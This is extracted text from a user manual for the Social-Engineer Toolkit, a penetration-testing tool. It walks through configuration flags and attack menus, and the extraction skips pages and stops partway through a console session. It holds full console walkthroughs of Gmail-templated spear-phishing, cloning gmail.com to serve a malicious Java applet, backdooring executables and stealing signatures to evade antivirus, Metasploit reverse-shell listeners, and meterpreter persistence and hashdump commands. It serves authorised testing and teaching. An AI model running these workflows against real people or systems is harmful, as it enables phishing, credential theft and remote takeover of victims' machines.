SETUMaers luna

MadoeSEfr T.06

[email protected] 11565 Pearl Rd. Suite 301 Strongsville, OH 44136 877.550.4728

Information Security Made Simple

1

Table of Contents

1   BEGINNING WITH THE SOCIAL ENGINEER TOOLKIT ...................................................... 2  

2   SET MENU’S.......................................................................................................................... 8  

3   SPEAR-PHISHING ATTACK VECTOR ............................................................................... 14  

4   JAVA APPLET ATTACK VECTOR ...................................................................................... 20  

5   FULL SCREEN ATTACK VECTOR ..................................................................................... 27  

6   METASPLOIT BROWSER EXPLOIT METHOD .................................................................. 29  

7   CREDENTIAL HARVESTER ATTACK METHOD ............................................................... 34  

8   TABNABBING ATTACK METHOD ..................................................................................... 38  

9   WEB JACKING ATTACK METHOD .................................................................................... 41  

10   MULTI-ATTACK WEB VECTOR ....................................................................................... 44  

11   INFECTIOUS MEDIA GENERATOR ................................................................................. 54  

12   TEENSY USB HID ATTACK VECTOR .............................................................................. 59  

13   SMS SPOOFING ATTACK VECTOR ................................................................................ 66  

14   WIRELESS ATTACK VECTOR .......................................................................................... 68  

15   QRCODE ATTACK VECTOR ............................................................................................ 70  

16   FAST-TRACK EXPLOITATION ......................................................................................... 71  

17   SET INTERACTIVE SHELL AND RATTE .......................................................................... 72  

18   SET AUTOMATION ........................................................................................................... 76  

19   FREQUENTLY ASKED QUESTIONS ................................................................................ 81  

20   CODE SIGNING CERTIFICATES ...................................................................................... 81  

21   DEVELOPING YOUR OWN SET MODULES .................................................................... 82  

2

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks

against the human element. SET was designed to be released with the
http://www.social-engineer.org launch and has quickly became a standard tool in a
penetration testers arsenal. SET is written by David Kennedy (ReL1K) and with a lot of
help from the community it has incorporated attacks never before seen in an
exploitation toolset. The attacks built into the toolkit are designed to be focused
attacks against a person or organization used during a penetration test.

1 Beginning with the Social Engineer Toolkit

The brain behind SET is the configuration file. SET by default works perfect for most
people however, advanced customization may be needed in order to ensure that the
attack vectors go off without a hitch. First thing to do is ensure that you have updated
SET, from the directory:

root@bt:/pentest/exploits/set# ./set-update
U src/payloads/set_payloads/http_shell.py
U src/payloads/set_payloads/shell.py
U src/payloads/set_payloads/shell.windows
U src/payloads/set_payloads/set_http_server.py
U src/payloads/set_payloads/persistence.py
U src/payloads/set_payloads/listener.py
U src/qrcode/qrgenerator.py
U modules/ratte_module.py
U modules/ratte_only_module.py
U set-automate
U set-proxy
U set
U set-update
U readme/LICENSE
U readme/CHANGES
root@bt:/pentest/exploits/set#

Once you’ve updated to the latest version, start tweaking your attack by editing the
SET configuration file. Let’s walk through each of the flags:

root@bt:/pentest/exploits/set# nano config/set_config

# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE

/pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3
3

Looking through the configuration options, you can change specific fields to get a
desired result. In the first option, you can change the path of where the location of
Metasploit is. Metasploit is used for the payload creations, file format bugs, and for the
browser exploit sections.

# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF

NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap

The Ettercap section can be used when you’re on the same subnet as the victims and
you want to perform DNS poison attacks against a subset of IP addresses. When this
flag is set to ON, it will poison the entire local subnet and redirect a specific site or all
sites to your malicious server running.

# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES

SENDMAIL=OFF

Setting the SENDMAIL flag to ON will try starting SENDMAIL, which can spoof source
email addresses. This attack only works if the victim’s SMTP server does not perform
reverse lookups on the hostname. SENDMAIL must be installed. If your using
BackTrack 4, it is installed by default.

# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB

ATTACK
WEBATTACK_EMAIL=OFF

When setting the WEBATTACK_EMAIL to ON, it will allow you to send mass emails to
the victim while utilizing the Web Attack vector. Traditionally the emailing aspect is only
available through the spear-phishing menu however when this is enabled it will add
additional functionality for you to be able to email victims with links to help better your
attacks.

# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS

REQUIRES YOU TO
# INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-
jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install
sun-java6-jdk
SELF_SIGNED_APPLET=OFF
4

The Java Applet Attack vector is the attack with one of the highest rates of success
that SET has in its arsenal. To make the attack look more believable, you can turn this
flag on which will allow you to sign the Java Applet with whatever name you want. Say
your targeting CompanyX, the standard Java Applet is signed by Microsoft, you can
sign the applet with CompanyX to make it look more believable. This will require you to
install java’s jdk (in Ubuntu its apt-get install sun-java6-jdk or openjdk-6-jdk).

# THIS FLAG WILL SET THE JAVA ID FLAG WITHIN THE JAVA APPLET TO
SOMETHING DIFFE$
# THIS COULD BE TO MAKE IT LOOK MORE BELIEVABLE OR FOR BETTER
OBFUSCATION
JAVA_ID_PARAM=Secure Java Applet
#
# JAVA APPLET REPEATER OPTION WILL CONTINUE TO PROMPT THE USER
WITH THE JAVA AP$
# THE USER HITS CANCEL. THIS MEANS IT WILL BE NON STOP UNTIL RUN IS
EXECUTED. T$
# A BETTER SUCCESS RATE FOR THE JAVA APPLET ATTACK
JAVA_REPEATER=ON

When a user gets the java applet warning, they will see the ‘Secure Java Applet’ as the
name of the Applet instead of the IP address. This adds a better believability to the java
applet. The second option will prompt the user over and over with nagging Java Applet
warnings if they hit cancel. This is useful when the user clicks cancel and the attack
would be rendered useless, instead it will continue to pop up over and over.

# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS

ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON

The AUTO_DETECT flag is probably one of the most asked questions in SET. In most
cases, SET will grab the interface you use in order to connect out to the Internet and
use that as the reverse connection and IP address. Most attacks need to be
customized and may not be on the internal network. If you turn this flag to OFF, SET
will prompt you with additional questions on setting up the attack. This flag should be
used when you want to use multiple interfaces, have an external IP, or you’re in a
NAT/Port forwarding scenario.

# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE
JAVA APPLET ATTACK
# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
WEB_PORT=80
5

By default the SET web server listens on port 80, if for some reason you need to
change this, you can specify an alternative port.

# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS

USUALLY HAS BETTER AV
# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST
CALC.EXE. AN EXAMPLE
# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE
/pathtoexe/putty.exe
CUSTOM_EXE=src/exe/legit.binary

When using the payload encoding options of SET, the best option for Anti-Virus bypass
is the backdoored, or loaded with a malicious payload hidden in the exe, executable
option. Specifically an exe is backdoored with a Metasploit based payload and can
generally evade most AV’s out there. SET has an executable built into it for the
backdooring of the exe however if for some reason you want to use a different
executable, you can specify the path to that exe with the CUSTOM_EXE flag.

# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL

INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www

The web server utilized within SET is a custom-coded web server that at times can be
somewhat slow based off of the needs. If you find that you need a boost and want to
utilize Apache, you can flip this switch to ON and it will use Apache to handle the web
requests and speed your attack up. Note that this attack only works with the Java
Applet and Metasploit based attacks. Based on the interception of credentials, Apache
cannot be used with the web jacking, tabnabbing, or credential harvester attack
methods.

# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS

THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
#
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK
VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON
SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
6

#
SELF_SIGNED_CERT=OFF
#
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM
FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE
/root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem

In some cases when your performing an advanced social-engineer attack you may
want to register a domain and buy an SSL cert that makes the attack more believable.
You can incorporate SSL based attacks with SET. You will need to turn the
WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well
however there will be an “untrusted” warning when a victim goes to your website.

TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE,
SOMETIMES IT CAN BE A LITTLE SLOW
# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
WEBJACKING_TIME=2000

The webjacking attack is performed by replacing the victim’s browser with another
window that is made to look and appear to be a legitimate site. This attack is very
dependant on timing, if your doing it over the Internet, I recommend the delay to be
5000 (5 seconds) otherwise if your internal, 2000 (2 seconds) is probably a safe bet.

# PORT FOR THE COMMAND CENTER

COMMAND_CENTER_PORT=44444
#
# COMMAND CENTER INTERFACE TO BIND TO BY DEFAULT IT IS LOCALHOST
ONLY. IF YOU WANT TO ENABLE IT
# SO YOU CAN HIT THE COMMAND CENTER REMOTELY PUT THE INTERFACE
TO 0.0.0.0 TO BIND TO ALL INTERFACES.
COMMAND_CENTER_INTERFACE=127.0.0.1
#
# HOW MANY TIMES SET SHOULD ENCODE A PAYLOAD IF YOU ARE USING
STANDARD METASPLO$
ENCOUNT=4

# IF THIS OPTION IS SET, THE METASPLOIT PAYLOADS WILL AUTOMATICALLY

MIGRATE TO
# NOTEPAD ONCE THE APPLET IS EXECUTED. THIS IS BENEFICIAL IF THE
VICTIM CLOSES
7

# THE BROWSER HOWEVER CAN INTRODUCE BUGGY RESULTS WHEN AUTO

MIGRATING.
AUTO_MIGRATE=OFF

The AUTO_MIGRATE feature will automatically migrate to notepad.exe when a

meterpreter shell is spawned. This is especially useful when using browser exploits as
it will terminate the session if the browser is closed when using an exploit.

# DIGITAL SIGNATURE STEALING METHOD MUST HAVE THE PEFILE PYTHON

MODULES LOADED
# FROM http://code.google.com/p/pefile/. BE SURE TO INSTALL THIS BEFORE
TURNING
# THIS FLAG ON!!! THIS FLAG GIVES MUCH BETTER AV DETECTION
DIGITAL_SIGNATURE_STEAL=ON

The digital signature stealing method requires the python module called PEFILE which
uses a technique used in Disitool by Didier Stevens by taking the digital certificate
signed by Microsoft and importing it into a malicious executable. A lot of times this will
give better anti-virus detection.

# THESE TWO OPTIONS WILL TURN THE UPX PACKER TO ON AND

AUTOMATICALLY ATTEMPT
# TO PACK THE EXECUTABLE WHICH MAY EVADE ANTI-VIRUS A LITTLE
BETTER.
UPX_ENCODE=ON
UPX_PATH=/pentest/database/sqlmap/lib/contrib/upx/linux/upx

In addition to digital signature stealing, you can do additional packing by using UPX.
This is installed by default on Back|Track linux, if this is set to ON and it does not find
it, it will still continue but disable the UPX packing.

# HERE WE CAN RUN MULTIPLE METERPRETER SCRIPTS ONCE A SESSION IS

ACTIVE. THIS
# MAY BE IMPORTANT IF WE ARE SLEEPING AND NEED TO RUN PERSISTENCE,
TRY TO ELEVATE
# PERMISSIONS AND OTHER TASKS IN AN AUTOMATED FASHION. FIRST TURN
THIS TRIGGER ON
# THEN CONFIGURE THE FLAGS. NOTE THAT YOU NEED TO SEPERATE THE
COMMANDS BY A ;
METERPRETER_MULTI_SCRIPT=OFF
#
# WHAT COMMANDS DO YOU WANT TO RUN ONCE A METERPRETER SESSION
HAS BEEN ESTABLISHED.
8

# BE SURE IF YOU WANT MULTIPLE COMMANDS TO SEPERATE WITH A ;. FOR

EXAMPLE YOU COULD DO
# run getsystem;run hashdump;run persistence TO RUN THREE DIFFERENT
COMMANDS
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -
X -A;getsystem

The next options can configure once a meterpreter session has been established, what
types of commands to automatically run. This would be useful if your getting multiple
shells and want to execute specific commands to extract information on the system.

# THIS FEATURE WILL AUTO EMBED A IMG SRC TAG TO A UNC PATH OF YOUR
ATTACK MACHINE.
# USEFUL IF YOU WANT TO INTERCEPT THE HALF LM KEYS WITH
RAINBOWTABLES. WHAT WILL HAPPEN
# IS AS SOON AS THE VICTIM CLICKS THE WEB-PAGE LINK, A UNC PATH WILL
BE INITIATED
# AND THE METASPLOIT CAPTURE/SMB MODULE WILL INTERCEPT THE HASH
VALUES.
UNC_EMBED=OFF
#

This will automatically embed a UNC path into the web application, when the victim
connects to your site, it will try connecting to the server via a file share. When that
occurs a challenge response happens and the challenge/responses can be captured
and used for attacking.

2 SET Menu’s
SET is a menu driven based attack system, which is fairly unique when it comes to
hacker tools. The decision not to make it command line was made because of how
social-engineer attacks occur; it requires multiple scenarios, options, and
customizations. If the tool had been command line based it would have really limited
the effectiveness of the attacks and the inability to fully customize it based on your
target. Let’s dive into the menu and do a brief walkthrough of each attack vector.

root@bt:/pentest/exploits/set# ./set

_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \| \ | |
9

/_______ //_______ / |____|

\/ \/

[---] The Social-Engineer Toolkit (SET) [---]

[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Development Team: Thomas Werth [---]
[---] Development Team: Garland [---]
[---] Report bugs: [email protected] [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]

Welcome to the Social-Engineer Toolkit (SET). Your one

stop shop for all of your social-engineering needs..

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

Select from the menu:

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

set> 1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small) number of
10

people with attached fileformat malicious payloads. If you want to spoof your
email address, be sure "Sendmail" is installed (it is installed in BT4) and change
the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do everything
for you (option 1), the second is to create your own FileFormat payload and use it
in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack

2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice:

The spear-phishing attack menu is used for performing targeted email attacks against
a victim. You can send multiple emails based on what your harvested or you can send
it to individuals. You can also utilize fileformat (for example a PDF bug) and send the
malicious attack to the victim in order to hopefully compromise the system.

Select from the menu:

Select from the menu:

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

set> 2

The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing

multiple web-based attacks in order to compromise the intended victim.
11

Enter what type of attack you would like to utilize.

The Java Applet attack will spoof a Java Certificate and deliver a Metasploit
based payload. Uses a customized java applet created by Thomas Werth to
deliver the payload.

The Metasploit browser exploit method will utilize select Metasploit browser
exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester Method will utilize web cloning of a website that has a
username and password field and harvest all the information posted to the
website.

The TabNabbing Method will wait for a user to move to a different tab, then
refresh the page to something different.

The web jacking attack method was introduced by white_sheep, Emgent and the
Back|Track team. This method utilizes iframe replacements to make the
highlighted URL link to appear legitimate however when clicked a window pops
up then is replaced with the malicious link. You can edit the link replacement
settings in the set_config if its to slow/fast.

The multi-attack will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, all at once to see which is successful.

1) Java Applet Attack Method

2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
99) Return to Main Menu

set:webattack>

The web attack vector is used by performing phishing attacks against the victim in
hopes they click the link. There is a wide-variety of attacks that can occur once they
click. We will dive into each one of the attacks later on.

3. Infectious Media Generator

12

The infectious USB/DVD creator will develop a Metasploit based payload for you and
craft an autorun.inf file that once burned or placed on a USB will trigger an autorun
feature and hopefully compromise the system. This attack vector is relatively simple in
nature and relies on deploying the devices to the physical system.

4. Create a Payload and Listener

The create payload and listener is an extremely simple wrapper around Metasploit to
create a payload, export the exe for you and generate a listener. You would need to
transfer the exe onto the victim machine and execute it in order for it to properly work.

5. Mass Mailer Attack

The mass mailer attack will allow you to send multiple emails to victims and customize
the messages. This option does not allow you to create payloads, so it is generally
used to perform a mass phishing attack.

Select from the menu:

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

set> 6

The Arduino-Based Attack Vector utilizes the Arduin-based device to

program the device. You can leverage the Teensy's, which have onboard
storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboard's it
will bypass any autorun disabled or endpoint protection on the
system.

You will need to purchase the Teensy USB device, it's roughly
13

$22 dollars. This attack vector will auto generate the code
needed in order to deploy the payload on the system for you.

This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
and other methods.

For more information on specifications and good tutorials visit:

http://www.irongeek.com/i.php?page=security/programmable-hid-usb-
keystroke-dongle

To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html

Special thanks to: IronGeek, WinFang, and Garland

This attack vector also attacks X10 based controllers, be sure to be leveraging
X10 based communication devices in order for this to work.

Select a payload to create the pde file to import into Arduino:

1) Powershell HTTP GET MSF Payload

2) WSCRIPT HTTP GET MSF Payload
3) Powershell based Reverse Shell Payload
4) Internet Explorer/FireFox Beef Jack Payload
5) Go to malicious java site and accept applet Payload
6) Gnome wget Download Payload
7) Binary 2 Teensy Attack (Deploy MSF payloads)
8) SDCard 2 Teensy Attack (Deploy Any EXE)
9) SDCard 2 Teensy Attack (Deploy on OSX)
10) X10 Arduino Sniffer PDE and Libraries
11) X10 Arduino Jammer PDE and Libraries
12) Powershell Direct ShellCode Teensy Attack

99) Return to Main Menu

set:arduino>

The teensy USB HID attack is a method used by purchasing a hardware based device
from prjc.com and programming it in a manner that makes the small USB
microcontroller to look and feel exactly like a keyboard. The important part with this is
it bypasses autorun capabilities and can drop payloads onto the system through the
onboard flash memory. The keyboard simulation allows you to type characters in a
18

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address

2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Do you want to use a predefined template or craft a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1

Below is a list of available templates:

1: Baby Pics
2: Strange Internet usage from your computer
3: New Update
4: LOL...have to check this out...
5: Dan Brown's Angels & Demons
6: Computer Issue
7: Status Report

Enter the number you want to use: 7

Enter who you want to send email to: [email protected]

What option do you want to use?

1. Use a GMAIL Account for your email attack.

2. Use your own server or open relay

Enter your choice: 1

Enter your GMAIL email address: [email protected]
Enter your password for gmail (it will not be displayed back to you):
19

SET has finished delivering the emails.

Do you want to setup a listener yes or no: yes

[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
|/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\

=[ metasploit v4.4.0-dev [core:4.4 api:1.0]

+ -- --=[ 891 exploits - 484 auxiliary - 149 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15540 updated 23 days ago (2012.06.27)

resource (src/program_junk/meta_config)> use exploit/multi/handler

resource (src/program_junk/meta_config)> set PAYLOAD
windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...

msf exploit(handler) >

Once the attack is all setup, the victim opens the email and opens the PDF up:
20

As soon as the victim opens the attachment up, a shell is presented back to us:

[*] Sending stage (748544 bytes) to 172.16.32.131

[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1139) at Thu
Sep 09 09:58:06 -0400 2010

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > shell

Process 3940 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

The spear-phishing attack can send to multiple people or individuals, it integrates into
Google mail and can be completely customized based on your needs for the attack
vector. Overall this is very effective for email spear-phishing.

4 Java Applet Attack Vector

The Java Applet is one of the core attack vectors within SET and the highest success
rate for compromise. The Java Applet attack will create a malicious Java Applet that
once run will completely compromise the victim. The neat trick with SET is that you can
completely clone a website and once the victim has clicked run, it will redirect the
victim back to the original site making the attack much more believable. This attack
vector affects Windows, Linux, and OSX and can compromise them all. Remember if
you want to customize this attack vector, edit the config/set_config in order to change
the self-signed information. In this specific attack vector, you can select web templates
which are pre-defined websites that have already been harvested, or you can import
your own website. In this example we will be using the site cloner which will clone a
21

website for us. Let’s launch SET and prep our attack.

Select from the menu:

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

set> 2

The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit

browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web-

site that has a username and password field and harvest all the
information posted to the website.

The TabNabbing method will wait for a user to move to a different

tab, then refresh the page to something different.

The Web-Jacking Attack method was introduced by white_sheep, Emgent

and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.
22

The Multi-Attack method will add a combination of attacks through the web
attack menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, all at once to see which is successful.

1) Java Applet Attack Method

2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
99) Return to Main Menu

set:webattack> 1

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing

and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

set:webattack> 2

SET supports both HTTP and HTTPS

Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com

*] Cloning the website: https://gmail.com

[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: QZ7R7NT
[*] Malicious java applet website prepped for deployment
23

What payload do you want to generate:

Name: Description:

1) Windows Shell Reverse_TCP Spawn a command shell on victim and

send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim
and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and
send back to attacker
4) Windows Bind Shell Execute payload and create an accepting
port on remote system
5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP
Inline
6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell,
Reverse TCP Inline
7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker
(Windows x64), Meterpreter
8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a
port home via multiple ports
9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP
using SSL and use Meterpreter
10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP
address and spawn Meterpreter
11) SE Toolkit Interactive Shell Custom interactive reverse toolkit
designed for SET
12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES
encryption support
13) RATTE HTTP Tunneling Payload Security bypass payload that will
tunnel all comms over HTTP
14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload
through shellcodeexec (A/V Safe)
15) Import your own executable Specify a path for your own executable

set:payloads> 2

Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.

1. avoid_utf8_tolower (Normal)
24

2. shikata_ga_nai (Very Good)

3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default): 16

[-] Enter the PORT of the listener (enter for default): 443

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...

[-] Backdoor completed successfully. Payload is now hidden within a legit
executable.

********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************

Enter choice yes or no: yes

Enter the port to listen for on OSX: 8080
Enter the port to listen for on Linux: 8081
Created by msfpayload (http://www.metasploit.com).
Payload: osx/x86/shell_reverse_tcp
Length: 65
Options: LHOST=172.16.32.129,LPORT=8080
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=172.16.32.129,LPORT=8081

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************
25

[--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]

[*] Launching MSF Listener...

[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
|/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\

=[ metasploit v4.4.0-dev [core:4.4 api:1.0]

+ -- --=[ 891 exploits - 484 auxiliary - 149 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15540 updated 23 days ago (2012.06.27)

resource (src/program_junk/meta_config)> use exploit/multi/handler

resource (src/program_junk/meta_config)> set PAYLOAD
windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD
osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
resource (src/program_junk/meta_config)> set ExitOnSession false
26

ExitOnSession => false

[*] Started reverse handler on 0.0.0.0:443
resource (src/program_junk/meta_config)> exploit -j
[*] Starting the payload handler...
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD
linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 8081
LPORT => 8081
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> set AutoRunScript migrate -f
[*] Started reverse handler on 172.16.32.129:8080
AutoRunScript => migrate -f
resource (src/program_junk/meta_config)> exploit -j
[*] Starting the payload handler...
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:8081
